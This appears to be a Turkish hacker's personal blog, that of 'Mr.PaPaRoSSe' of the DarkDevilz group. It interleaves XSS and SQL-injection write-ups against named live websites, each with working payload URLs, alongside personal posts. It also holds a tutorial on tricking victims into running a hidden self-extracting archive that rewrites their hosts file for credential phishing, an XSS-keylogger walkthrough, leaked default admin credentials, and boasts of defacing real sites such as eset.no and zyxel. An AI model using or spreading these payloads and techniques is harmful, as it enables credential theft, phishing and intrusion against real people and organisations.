GraphicClone Cross Site Scripting

# Exploit Title: GraphicClone XSS
# Date: 24.12.2011 - 13.18
# Author: Mr.PaPaRoSSe
# Tested On: Win7
# Platform: Php

-------------------------------------------------------------
SearchBOX
graphics.cloneforest.com/search/

<script>ale rt(document.cookie)</script>

http://graphics.cloneforest.com/search/?term=<script>alert( document.cookie)</script>

XSS
-------------------------------------------------------------
Mr.PaPaRoSSe / 3spi0n 
paparosse.blogspot.com
GrayHatz.co

Pet Listing Cross Site Scripting

Aktiflik sıkıntısını yaşıyorum.Kendi ismim ile bazı işlere imza attım.Ondan dolayı pek boş zamanım olmuyor.Olduğu zamanda şekil a görüntü b böyle araştırıyoruz ^^

# Exploit Title: Pet Listing Script XSS
# Date: 09.12.2011 - 17.00
# Author: Mr.PaPaRoSSe
# Tested On: Win7
# Platform: Php

-------------------------------------------------------------

preview.php?controller=Listings&action=search&listing_search=1&type_id=&bedrooms_from=">



DEMO
http://www.classifiedsgeek.com/pet-listing/demo/preview.php?controller=Listings&action=search&listing_search=1&type_id=&bedrooms_from=">

-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: Http://DarkDevilz.in/
-------------------------------------------------------------
- Mr.PaPaRoSSe / 3spi0n -
~ And All DD'z Family
-------------------------------------------------------------
#~ DarkDevilz - Defence And Destruction Group'z - TURKEY ~#

Whois

WHOIS.COM

http://domains.whois.com/

http://domains.whois.com/hosting.php?type=%22%3E%3Cscript%3Ealert%28%22DarkDevilZ%20/%20Mr.PaPaRoSSe%20/%203spi0n%22%29%3C/script%3E

Mr.PaPaRoSSe / DarkDevilz/ 3spi0n

CareerBuilder Cross Site Scripting

# Exploit Title: CareerBuilder XSS
# Date: 20.11.2011 - 05.50
# Author: Mr.PaPaRoSSe
# Tested On: Win7
# Platform: Php

-------------------------------------------------------------

search box

al ert(document.cookie)

DEMO
http://www.eenbaan.nl/banen/zoeken/?keyword=">

-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: http://DarkDevilz.in/
-------------------------------------------------------------
3spi0n - ALEXTRAX - sanTiq0
Deathless - ZyX - Tarxes
53rh4+ - bLaCk_uMo - PeRs
syntaX - Mavi_Karalik - DarkCOD3R
x-Leader - Cyborg - Y2J

~ And All DD'z Family
-------------------------------------------------------------
#~ DarkDevilz - Defence And Destruction Group'z - TURKEY ~#

http://packetstormsecurity.org/files/107157/careerbuilder-xss.txt

Sayfa of FIŞKIN

Can ciğer kuzu sarması kardeşim sayfa açmış.

http://www.facebook.com/gulsene.gavur

Gülsene Gavur :)
Beğenmeden geçmeyin.

Hayırlı olsun..

Crunch with Wordlist

Icdomains XSS

# Exploit Title: Icdomains XSS
# Date: 11.11.2011 - 18.20
# Author: Mr.PaPaRoSSe
# Tested On: BackTrack 5 - Win7
# Platform: Php

-------------------------------------------------------------

Searchbox

<script>alert(do cument.cookie)</script>

http://icloudcenter.net/demos/icdomains/searchresults.php

Search

-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: Http://DarkDevilz.in/
-------------------------------------------------------------
3spi0n     -  ALEXTRAX      -  sanTiq0 
Deathless  -  ZyX           -  Tarxes
53rh4+     -  bLaCk_uMo     -  PeRs 
syntaX     -  Mavi_Karalik  -  DarkCOD3R
x-Leader   -  Cyborg        -  Y2J

~ And All DD'z Family
-------------------------------------------------------------
#~ DarkDevilz - Defence And Destruction Group'z - TURKEY ~#

http://packetstormsecurity.org/files/106867/icloudcenter-xss.txt

Desktop Phishing

Selamun Aleyküm arkadaşlar.
Sizlere " Desktop Phishing " hakkında bir anlatım yapacağım.Bu yöntemi bende internette görmüştüm (Sonuçta Bunları Bilerek Doğmadık) denedim 1-2 kere gerçekten güzel yöntemdir.

Şimdi amaç olarak bir dosya oluşturucaz.Sonra kurban bunu açacak.Ardından örnek facebook.com adresinden giriş yapacak şifre bize gelecek.Fake mantığıdır.Desktop Phishing tarafında kurban örnek olarak facebook.com adresinde gezinmeye devam eder ama aslında fake bir sayfada gezinmektedir.Domain ismi gerçek sayfa fake.

Bunlar için windows tarafında hosts dosyasını kullanacağız.Bu hosts dosyası ise domain adlarını ve bu domainlere ait ip adreslerini saklamaktadır.

Bu hosts dosyası C:\WINDOWS\system32\drivers\etc tarafında dır. Açmak için notepad kullanabilirsiniz.

Şimdi örnek olarak bir hosts dosyamızın içinde neler var bakalım.

Evet görüldüğü gibi bu şekilde.

Örnek site olarak facebook.com olacak

Şimdi kendimize ait bir host var diyelim.Ve içine fake dosyalarını attık.
Şimdi diyelim ki facebook.com 1.1.1.1 ip adresi üzerinden.Bizim hostumuzun ip adresi ise 4.4.4.4. O zaman eğer host tarafında 1.1.1.1 olan facebook tarafını 4.4.4.4 yaparsak facebook.com domain olarak görülür ama veri için başvurduğu ip adresi 4.4.4.4 olmaz mı ? OLUR tabiki de..

O zaman hosts kısmını şu şekilde düzenliyoruz.

vet bu şekilde düzenliyoruz.Kendinize kaydetmeyin bunu kurbana yedirmemiz lazım ^^

Şimdi ne yapacağız diye basit bir tekrar yaparım.Kurbanın eğer hosts dosyasını daha demin ki gibi düzenlersek kurban facebook.com domaini üzerinden takılmaya devam eder ama aslında bizim fake ip adresinde takılmaktadır.

Şimdi buralar basitti bir diğer kısım ise kurbana bunu nasıl yaptıracağız?

Bunun için winrar tarafında ufak bir hile yapacağız.Adam örnek ddz dosyasını açtığı zaman bizim hosts dosyamız otomatik olarak kendini adamın C:\WINDOWS\system32\drivers\etc klasörüne kopyalacak.

Peki bunu nasıl yapacağız derseniz onuda anlatalım.Hazırladığımız hosts dosyasını masaüstüne alalım.
Tabiki gerekli ayarları yaptık düzenlemeleri yaptık dosya hazır.

Şimdi dosyamıza sağ tıkıyoruz ve arşive ekle diyoruz.

SFX arşivi oluştur adında bir buton var ona tıklıyoruz.genel tarafında oluyor...

Şimdi ise Gelişmiş Diyoruz ve SFX seçeneklerine tıklıyoruz.

Çıkacak yok tarafına C:\WINDOWS\system32\drivers\etc yazıyoruz.

Şimdi ise modlar tarafına gelerek tümünü gizle diyoruz.
Güncelleme kısmında ise varolan dosyaları atla diyoruz.

Ardından ise tamam tamam diyerekten çıkıyoruz.

Masaüstünde ddz.exe adında bir dosya oluşuyor.

Bunu kurbana açtırmamız lazım.Herhangi bir exe binder ile birleştirerek kurbana veriyoruz açtığı zaman ve tamam dediği zaman işlem tamamlanmış oluyor.

Bu anlatımda bu kadar dediğim gibi güzel bir yöntemdir.1-2 kişide denedim güzelcene oldu :)
Bu hack huck işlerinden anlamayan insanlar %65 yerler.Ama gereksiz yere onlara böyle birşey yapmanında anlamıyok değilmi ? ^^

Selametle / Mr.PaPaRoSSe / DarkDevilZ

Web Sayfa Çizimi

Selamun aleyküm
Bir ara modem de sorun vardı bende ne yapayım derken photoshop'u açtım ve böyle bir ders ortaya çıktı.Bu basit diyenler için yeni başlayanlara bir hazinedir diyorum.Çünkü ben kendimi biliyorum ilk açtığımda adımı zor yazmıştım ^^
Basit bir çalışma oldu mantığı anlamanız için yaptım.Birden photoshop'u açtım ve gelişi güzel bir şeyler yaptım.Eğer vakit bulursam bunun kodlamasınıda video olarak çekerim...

LİNK:
http://hotfile.com/dl/134422601/062f8da/darkdevilz.zip.html

86.177 kb.
22 dakika 12 saniye.
Şifre yok.

SmartJobBoard Cross Site Scripting

# Exploit Title: SmartJobBoard XSS
# Date: 05.11.2011 - 18.14
# Author: Mr.PaPaRoSSe
# Tested On: BackTrack 5 - Win7
# Platform: Php

-------------------------------------------------------------


DEMO:
http://www.smartjobboard.com/demo/search-resumes/

Keywords : Enter

http://www.smartjobboard.com/demo/search-results-resumes/?action=search&listing_type[equal]=Resume&keywords[exact_phrase]=%3Cscript%3Ealert%28%22DDz+Mr.PaPaRoSSe%22%29%3C%2Fscript%3E

-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: Http://DarkDevilz.in/
-------------------------------------------------------------
3spi0n - ALEXTRAX - sanTiq0
Deathless - ZyX - Tarxes
53rh4+ - bLaCk_uMo - PeRs
syntaX - Mavi_Karalik - DarkCOD3R
x-Leader - Cyborg - Y2J

~ And All DD'z Family
-------------------------------------------------------------
#~ DarkDevilz - Defence And Destruction Group'z - TURKEY ~#

http://packetstormsecurity.org/files/106637/smartjobboard-xss.txt

What’s happening?

Gördüğüm kadarı ile artık çoğu insan twitter tarafına geçti geçmesede bir twitter açtı.Benim yoktu açmamıştım gereksiz görmüştüm.Baktım ki bir tane açmanın zamanı gelmiş artık.Ve şeytana uyaraktan açtık işte bir adet...

https://twitter.com/#!/MrPaPaRoSSe

MyChurchWebsite Cross Site Scripting

# Exploit Title: MyChurchWebsite XSS
# Date: 04.11.2011 - 17.55
# Author: Mr.PaPaRoSSe
# Tested On: BackTrack 5 - Win7
# Platform: Php

-------------------------------------------------------------



search.php?pageID=search&search=XSS

http://cacop.net/search.php?pageID=search&search=%3Cscript%3Ealert%28document.cookie%29%3C/s

cript%3E

Church Website Provided by mychurchwebsite.net

-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: Http://DarkDevilz.in/
-------------------------------------------------------------
3spi0n - ALEXTRAX - sanTiq0
Deathless - ZyX - Tarxes
53rh4+ - bLaCk_uMo - PeRs
syntaX - Mavi_Karalik - DarkCOD3R
x-Leader - Cyborg - Y2J

~ And All DD'z Family
-------------------------------------------------------------
#~ DarkDevilz - Defence And Destruction Group'z - TURKEY ~#


http://packetstormsecurity.org/files/106599/mychurchwebsite-xss.txt

Domain Shop Cross Site Scripting

# Exploit Title: Domain Shop XSS
# Date: 30.10.2011 - 19.05
# Author: Mr.PaPaRoSSe
# Tested On: BackTrack 5 - Win7
# Platform: Php

-------------------------------------------------------------


http://www.domainshopscript.com/demo/index.php
Search Box

"><script>alert(document.domain)</script>

© Copyright 2006 Domain Shop Script



-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: Http://DarkDevilz.in/
-------------------------------------------------------------
3spi0n     -  ALEXTRAX      -  sanTiq0 
Deathless  -  ZyX           -  Tarxes
53rh4+     -  bLaCk_uMo     -  PeRs 
syntaX     -  Mavi_Karalik  -  DarkCOD3R
x-Leader   -  Cyborg        -  Y2J

~ And All DD'z Family
-------------------------------------------------------------
#~ DarkDevilz - Defence And Destruction Group'z - TURKEY ~#

Mndajans Script SQL Injection

# Exploit Title: Mndajans Script SQL Injection
# Date: 29.10.2011 - 16.13

# Author: Mr.PaPaRoSSe

# Tested On: BackTrack 5 - Win7
# Platform: Php

-------------------------------------------------------------

Scripts are mndbilgisayar
-------------------------------
default user : mndajans
default pass : servis
Admin panel : /admin/

Default User & Pass & Admin demo
http://alpdizayn.com.tr/admin/
--------------------------------
MND Kontrol PANEL
SQL Ýnjection

UrunDetay&id=4' SQL

-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: Http://DarkDevilz.in/
-------------------------------------------------------------

3spi0n - ALEXTRAX - sanTiq0
Deathless - ZyX - Tarxes
53rh4+ - bLaCk_uMo - PeRs
syntaX - Mavi_Karalik - DarkCOD3R
x-Leader - Cyborg - Y2J

[And DD'z Family]

[DarkDevilz - Defence And Destruction Group'z - TURKEY]

http://packetstormsecurity.org/files/106419/mndajans-sql.txt

Rinkya Cross Site Scripting

# Exploit Title: Rinkya Cross Site Scripting
# Date: 22.10.2011 - 17.52
# Author: Mr.PaPaRoSSe
# Tested On: BackTrack 5 - Windows xp sp3
# Platform: Php

-------------------------------------------------------------

search.php

http://www.rinkya.com/membership/search.php

"><script>alert("DDz Mr.PaPaRoSSe")</script>

http://www.rinkya.com/membership/search.php?sType=Auction&s........

-------------------------------------------------------------
Contact: paparosse.blogspot.com
Greetz: http://DarkDevilz.in/
-------------------------------------------------------------
3spi0n     -  ALEXTRAX      -  sanTiq0  
Deathless  -  ZyX           -  Tarxes
53rh4+     -  bLaCk_uMo     -  PeRs 
syntaX     -  Mavi_Karalýk  -  DarkCOD3R

[And DD'z Family]

[DarkDevilz - Defence And Destruction Group'z - TURKEY]

WordPress ThemeCity Cross Site Scripting

# Exploit Title: WP ThemeCity XSS
# Date: 21.10.2011 - 19.05
# Author: Mr.PaPaRoSSe
# Tested On: BackTrack 5 - Windows xp sp3
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Demo : http://www.steveledwards.com/

Search Box
"><script>alert("DDz Mr.PaPaRoSSe")</script>

http://www.steveledwards.com/?s=%22%3E%3Cscript%3Ealert%28%22DDz+
Mr.PaPaRoSSe%22%29%3C%2Fscript%3E&submit=Search

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# We attempted to work, you can not imagine.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Contact: paparosse.blogspot.com
# Greetz: Http://DarkDevilz.in/
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
Mr.PaPaRoSSe  Black_Umo  ALEXTRAX  Brs_BaRoN  ZyX  x-Leader
DARKCOD3R  Santiq0  53rh4t  PerS   3spi0n  syntaX

[And DD'z Family]

[DarkDevilz - Defence And Destruction Group'z - TURKEY]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 

 packetstorm

http://packetstormsecurity.org/files/106071/wpthemecity-xss.txt           

mynet.com heyk

Bir deneme yapam dedim ,öyle işte..
http://foto.aktuel.mynet.com/yarisma
http://arab-zone.org/mirror/22145/foto.aktuel.mynet.com/yarisma
http://www.askeri-darbe.org/wiev_mirr0r/?id=97994
http://proof-h.org/deface_mirror/?id=33032

honda

http://dog.honda.co.th/
http://www.zone-ar1.com/attackmirror/mirror.php?id=15720

XSS keylogger

"Serhat kardeşim için hızlı olarak anlattım yakında video çekeceğim."


Selamun aleyküm arkadaşlar.
Mynet'te xss adlı bir konum vardı.İşte orada xss açığını keylogger gibi kullanmayı anlatacaktım.Şimdilik resimli bir anlatım yapıyorum.Ama ileride videolu olarak anlatabilirim boş bir günümde.

Şimdi bizim amacımız şu olacak.Adama bir link atacağız ve adam bu linke tıklayacak.İşte birşeyler yapacak ve login olacak.Gelen şifreyi ise biz alacağız mantık bu şekilde.Bu iş için kullanacağımız site ise mynet.

Bu olayı gerçekleştirebilmek için bize gerekenler;
BackTrack5
xss-harvest.pl (Konunun altında paylaştım.)
Xss açıklı login sistemli site
Açık bir port (bende 443)
Ve bir adet Mr.PaPaRoSSe ^^

Şimdi bir sitemize bakalım ;
http://fesmekan.mynet.com/
tarafını kullanacağım.

Şimdi ilk olarak backtrack tarafında xss-harvest.pl dosyamızı wget ile alıyoruz çağırıyoruz çekiyor her ne ise ondan sonra chmod 777 yaparak ilk işlemi bitiriyoruz.Çektiğim site ismini sildim çünkü benim depo sitem o herşeyim orada :)





Evet güzel gidiyoruz.Şimdi bizim xss-harvest için kurmamız gereken bazı perl modulleri var.
Bunun için uygulayacağımız komut ise;
sudo apt-get install libnet-server-perl



biraz beklemeniz lazım.Tamamdır iş bitti.Şimdi şey yapalım eee kurbana atacağız linki düzenleyelim.
Xss sitede şu şekilde bulunmaktadır.

http://fesmekan.mynet.com/istanbul/m...%3E&l=istanbul

Görüldüğü gibi.Kendi yazdığımız kısımları silelim böylece boş bir alan kalacak.

http://fesmekan.mynet.com/istanbul/mekanlar/?q= &l=İstanbul

Gördüğünüz o boşluğa ise belirli kodlar koyacağız.
Şimdi bu dursun backtrack tarafına giderek bir bağlantı işlemini yapalım.

./xss-harvest.pl -l -p 443



yapıyoruz.Burada ben 443. port açık olduğu için böyle birşey yaptım.Siz hangi port açıksa onu kullacaksınız.
Şimdi tekrar kod kısmına dönelim en son şu şekildeydi.

http://fesmekan.mynet.com/istanbul/mekanlar/?q= &l=İstanbul

Bunun için şöyle bir kod kullanacağız.

Kolifa Haber Script 1.3 SQL Injection

# Exploit Title: Kolifa Haber Script 1.3 SQL
# Date: 08.10.2011 - 20:36

# Author: Mr.PaPaRoSSe

# Download Script: http://scripti.org/demo.php?id=97
# Tested On: BackTrack 5 - Windows xp sp3
# Platform: Php
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Vunl file : show.php

Exploit:

http://localhost/haber_pro/kategorigoster.php?kat_id=SQL injection

Panel:
http://haberpro.awardspace.com/haber_pro/admin/admingiris.php

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# We attempted to work, you can not imagine.
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
# Contact: paparosse.blogspot.com
# Greetz: Http://DarkDevilz.in/
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
' 3spi0n ~# Black_Umo ALEXTRAX Brs_BaRoN ZyX x-Leader
L4NETLY GrayTendriL DARKCOD3R Santiq0 53rh4t PerS Mavi Karanlik Tarxes

[And DD'z Family]

[DarkDevilz - Defence And Destruction Group'z - TURKEY]
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>



http://packetstormsecurity.org/files/view/105624/kolifahaber-sql.txt

Ebuddy XSS of p4

Şimdi ben giriş yaparken böyle birşey aklıma geldi.Daha önce bulunmuş denenmiş olabilir.Ben kendim düşündüm bunu onun için paylaşıyorum.

XSS yahoo,AIM,ICQ kısımlarında bulunmaktadır.

Author : Mr.PaPaRoSSe - DarkDevilz.in
Title  : ebuddy xss

http://www.ebuddy.com

<script>alert("DarkDevilz / Mr.PaPaRoSSe")</script>

havadurumu mynet xss

Bulalı bayağı oldu öyle arşive atmışım.Yakında çekeceğim video için paylaşıyorum açıkçası.Şimdi bununla nolcak derseniz backtrack tarafında bu xss açıklarını bir keylogger gibi kullanabilirsiniz.Onun da anlatımını boş bir günümde yapacağım.Bu aralar biraz meşgul'um.Ben önceden siteyi koydum ^^

##########################
# Title: havadurumu mynet xss
# Author: Mr.PaPaRoSSe | DarkDevilZ.in
##########################

http://havadurumu.mynet.com/

 

p4 vb theme

Selamun Aleyküm arkadaşlar.
Can sıkıntısına bir tane vb teması yaptım.Paylaşayım dedim.
Sabah 6:40'da başladım 14:43'de bitti.
Cevapla butonundan ihbar butonuna kadar hepsi çalışmaktadır.
Yani örnek olarak internette bir arama yaptığınızda çoğu sitede adam linkler kısmını resim olarak vermektedir.Ama siz yeni konu dediğinizde birşey çıkmayacaktır.Yeni konu dediğinizde yeni konunun açılması için şöyle bir kod gerekmektedir.

<if condition="$show['newthreadlink']"><a href="newthread.php?$session[sessionurl]do=newthread&amp;f=$foruminfo[forumid]" rel="nofollow"><img src="files/kate/newkonu.png" alt="$vbphrase[post_new_thread]" border="0" />

Bu tip bir kod işinizi görenecektir.Ben bunların hepsini hazırladım yaptım bitirdim halletim ^^
Üstte header tarafındaki menude kurallar kısımlarına filan link vermedim siz onları kafanıza göre yaparsınız.

3.8.6 üzerinde yaptım.Menuleri filan kendim ps ile yaptım.Uzmanlık alanları kısmı yada işte ünvan madalyon filan eklemedim çünkü şimdi postbit_legacy tarafına baktığınız da benim kodlardan filan kafanız karışsın istemedim.Siz isterseniz eklersiniz zor birşey değil sonuçta.
Onun dışında Memberinfo tarafı ile pek oynamadım basit bir düzenleme yaptım.Şu anda yazmaya devam ettiğim bir memberinfo var bittiğinde paylaşacağım.
Başka bir sayfada login olmanız lazım.Login kısmını sildim.İnternetten vbulletin ayrı sayfadan login diye aratırsanız kodları çıkar zaten.Yada vb ek sayfa yapmak şeklinde.

Resimleri üyenin gözünden ve misafirin gözünden olmak üzere 2'ye ayırdım.
Üye olmayanlara menuleri gizledim.
Resimleri ps ile birleştirdim.

-----------------------------------------------------------
Misafirin Gözlerinden;

Forumhome

------------------------------------------------------------

Bence o kadar da kötü sayılmaz ^^
Benden bu kadar takıldığınız bir yer olursa sorarsınız.
Selametle...


Not: Rar'ın içine 2 tane vbulletin-style.xml koydum.Bende biri çalışıyor biri çalışmıyor.Arkadaşta da diğeri hata vermiş.Her ihtimale karşı 2'sinide koydum.Ve ss'lerde imleç çıkmış kusura bakmayın mozillada  tam ben basarkene gelmiş ^^


İNDİR
http://www.dosya.tc/server4/EzMYNC/tema.rar.html
http://hotfile.com/dl/131791239/93b3d54/tema.rar.html

Lessons library sql | p4

Bildiğiniz gibi bulduğum açıkları paylaşmıyordum.Paylaşmadığım içinde artık yavaş yavaş hiç açık aramamaya başladım.En son bulduğum açık 2,5 ay öndesine ayit.Bende 1-2 tane bulup yayınlayam dedim.

# Exploit Title: Lessons library sql injection

# Date: 06.10.2011 - 18.53

# Author: Mr.PaPaRoSSe

# Download Script: http://up.tsmim.com/uploads/files/tsmim-e47615d4bd.zip

# Tested On: BackTrack 5 - Windows xp sp3

# Platform: Php

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Vunl file : show.php

Exploit:

http://localhost/droos/show.php?cid=2&page=Sql Ä°njection

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

# We attempted to work, you can not imagine.

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

# Contact: paparosse.blogspot.com

# Greetz: Http://DarkDevilz.in/

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Mr.PaPaRoSSe Black_Umo ALEXTRAX Brs_BaRoN ZyX x-Leader

L4NETLY GrayTendriL DARKCOD3R Santiq0 53rh4t PerS

[And DD'z Family]

[DarkDevilz - Defence And Destruction Group'z - TURKEY]

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

packetstorm
http://packetstormsecurity.org/files/view/105599/tsmim-sql.txt

Steve Jobs yaşamını yitirdi

Apple’ın kurucularından milyarder işadamı Steve Jobs, tedavi gördüğü ABD’nin California eyaletinde yaşama veda etti.Kısa bir süre önce kanser nedeniyle Apple’ın CEO’luk görevini terk eden Jobs, 56 yaşındaydı.

Jobs, programlama, müzik ve telefon sanayisinde devrim yaratan bilgisayar ürünlerinin beyniydi. Apple’ın eski CEO’su olan Jobs, Ağustos ayında pankreas kanseriyle boğuştuğunu açıklayarak bu görevini Tim Cook’a devretmişti. Apple’ı 1976 yılında kuran isimlerden biri olan Jobs, 2009 yılında karaciğer nakli yaptırmıştı.

DÜNYANIN BİR NUMARASI

Apple, Jobs’ın iPhone ve iPad ile yaptığı çıkışın ardından bu yıl Exxon Mobil’i geride bırakarak dünyanın en değerli şirketi unvanını kazandı. Apple’ın Eylül 1997’de 7.1 milyar dolar olan geliri, bu yıl 65.2 milyar dolara yükseldi.

Masaüstü bilgisayarı iMac ile başlattığı çıkışı birbiri ardına gelen yeni ürünlerle devam ettiren Jobs, bilgisayar çağında bir devrim başlattı. iPod satışlarıyla CD’leri tarihe gömen Jobs, müzik piyasasındaki en güçlü insanlardan biri haline geldi.

Jobs, tüketicilerin dikkatini yeni çıkaracağı ürünlere odaklamayı her zaman başardı. Apple’ın eski patronu bir keresinde, “İnsanlar genelde onlara gösterdiğiniz ana kadar ne istediklerini bilmiyorlar” demişti.

HASTALIĞINI GİZLEDİ

Steve Jobs, 2004 yılından beri eşine ender rastlanan 'nöroendokrin' denilen tümör kaynaklı bir pankreas kanseri türüyle mücadele ediyordu.

Hastalığının ilk dönemlerinde bu konuda bir açıklama yapmayan Jobs, bir süre sonra belirgin şekilde kilo kaybetmeye başladı. Karaciğer nakli olduğu 2009’da Apple’dan altı ay ayrı kalan Jobs, bu yıl Ocak ayında yine tedavi sürecine girmişti.

Yaklaşık 8.3 milyar dolar serveti olduğu tahmin edilen Jobs, “Mezarlıktaki en zengin adam olmak benim için bir anlam ifade etmiyor... Çok güzel bir şey yaptıktan sonra yatağa gitmek... benim için önemli olan bu” demişti.

JOBS'UN ARDINDAN...

www.apple.com/stevejobs sayfasında yayınlanan açıklamada, "Apple, vizyon sahibi ve yaratıcı bir dehayı, dünya ise harkulade bir insanı kaybetti. Steve’i tanıyacak ve onunla çalışacak kadar şanslı olanlarımız ise iyi bir dostunu ve ilham verici bir akıl hocasını kaybetti. Steve, arkasında yalnızca kendisinin kurabileceği bir firma bıraktı ve onun ruhu sonsuza dek Apple’ın ilham kaynağı olacak" ifadelerine yer verildi.

Jobs’ın ölümü ile ilgili düşüncelerini, anılarını ve taziyelerini paylaşmak isteyenlerin rememberingsteve@apple.com adresine e-posta gönderebilecekleri belirtildi.

http://www.hurriyet.com.tr/teknoloji/18913725.asp

eset.no/Hacked

Hayatta en sevmediğim şey zone almaktır.

http://www.eset.no/

http://turk-h.org/defacement/view/395903/eset.no/
http://legend-h.org/mirror/226284/eset.no/

Python Tkinter

python tkinter grafik arayüz tarafı ile ilgili bir anlatım yaptım.Python iyidir herkes öğrensin :)

Gisele Çizim

S.a
Hızlı ve öfkeli hastalarından biriyimdir.
İnternette filmin resimlerine bakarken aşağıda ki resmi buldum.
Bu arada bu kim derseniz gisele harabo
Sonra düşündüm bunu çizim haline getirebilirmiyim diye.
Sabah 9'da başladım saat 11:30'da bitti.
En çok şu göz kısımları ve saçlar beni zorladı onun dışında herşey kolaydı.
Limonuna kadar yaptım.Bayağı kafa yordum..
Ten rengi benim yaptığım çalışmada farklı onun dışında birde gözlerde ufak bir gölgelik eksik.
İşte o yüzden suratı tam olarak bezemiyor.
Onunla da uğraşamıyacağım :)Ruju benimkinin kırmızı filan onlara girmicem...

Detay :
Adobe photoshop cs2'de
pen tool ile
9:00 ile 11:30 arasında
mause ile Tayfun # Mr.PaPaRoSSe tarafından çizilmiştir..
Tamamını ben çizdim.Normalde pek ps çalışması yapmam hatta paint dahi kullanmadığımdan insanlara bir photoshop gösterince kime yaptırdın diyorlar.Bunu ben yaptım hueeee :)


Çizim şekli;

Selametle...

Anlama san da

Arada karışık sözler ediyor.Anlamıyorsunuz ne diyor.Ama nedense hoşuma gitti.

Ah insanlar ahh...

Bu insanları bir türlü çözemiyorum.Hep yanında takıldığı canım ciğerim dedikleri adamları 1dk içerisinde gözlerinden çıkarabiliyorlar.Böyle insanları hiçbir zaman sevmedim sevmemde.Bende böyle insanları 1dk içerisinden gözümden çıkarabiliyorum.Ve anladım ki birilerini ne kadar alltan alırsanız yaptıklarını görmezden gelirseniz o kadar havalanıyorlar.Bu yüzden artık benden iyi niyet beklemeyin.Kimsenin beni sevip sevmemesi umrumdayım değil ben buyum ve kendim ile mutluyum.

Tabi ki bu söylediklerim veya yakın zamanda söyleyeceklerim insan olmak yada olmamak arasında ki çizgide gezen varlıklar içindir.

Film Tavsiyesi

Şimcik sizlere bir film tavsiyesi yapam...
127 hours gerçekten güzel bir film.İnsan izlediği zaman ya ben bu durumda olsaydım bende o adam gibi yapabilirmiydim filan diye düşünüyor.Filmde pek fazla karakter yok lakin gerçekten izletiriyor kendini..

"6 kez Oscar'a Aday Gösterildi. 11 kez başka ödüller için aday gösterildi"

Gerçek bir hikaye,olay.
Benim gibi gerilim mecera dram sevenler için iyidir ^^

turkishteam.in

Tarxes (Kızıl Şaman) adam hiç durmaz hep bir plan içerisindedir.Adamım (galp)
Fazla kasmaya gerek yoktu crack yetti birde bunlarla mı uğraşıcaz...
Zaten ben hack yapmıyorum tarxes takıldı...

http://k0-ka.in/attack/?id=44183

zyxel.co.cr/muck

Bildiğiniz gibi hack işlerini bıraktım dolaşırken bir script rast geldi onunla ilgili arama yaparken de bu siteyi buldum...

"1989 yılında kurulan ZyXEL, dünyanın önde gelen iletişim ve haberleşme teknolojileri sağlayıcısıdır. Kurulduğu günden bu yana pek çok yeniliğe imza atmış bulunan ZyXEL, 3 bin 200’den fazla çalışanı ve 70 ülkedeki merkezleri aracılığıyla 150 ülkeye çözüm sunmaktadır. Merkezi Tayvan’da olan firmanın küresel çapta 32 bölge ofisi ve 2 Ar-Ge merkezi bulunmaktadır. Dünyanın en büyük DSL ve residential gateway üreticisi olan ZyXEL,18 kategori altında 400’ün üzerinde ürün sunmaktadır..

http://www.zyxel.co.cr/
http://k0-ka.in/attack/?id=44066
http://turk-h.org/defacement/view/393421/zyxel.co.cr/

http://intranet.zyxel.co.cr
http://turk-h.org/defacement/view/393422/intranet.zyxel.co.cr/
http://zone-h.org/mirror/id/14928896

http://zyxel.com.do/
http://turk-h.org/defacement/view/393423/zyxel.com.do/
http://zone-h.org/mirror/id/14928900

its.zyxel.co.cr
http://turk-h.org/defacement/view/393454/its.zyxel.co.cr
http://zone-h.org/mirror/id/14929322

its.zycr.net/
http://turk-h.org/defacement/view/393453/its.zycr.net/
http://zone-h.org/mirror/id/14929318

3spion'un indexi aldım ondan title'ı editlemedim kimden aldığım belli olsun :)

Metasploit | BackTrack | Mr.PaPaRoSSe

Tamam kabul ediyorum başlık bıraz saçma oldu.

"backtrack|metasploit|p4"
Ama en uygun başlık bu bence :)
Elimden geldiğince backtrack-metasploit üzerinde anlatımlar yapıcam.
İlk anlatımlar ile başlıyoruz.
Hadi bakalım...

 

 

Selametle...
Tayfun # Mr.PaPaRoSSe

Ben bile SM

Şimdi bir hacker arkadaşın nasıl msn facebook adresini aldım onu anlatıcam.
Dün yaptım biraz sm biraz cinlik diyelim ^^

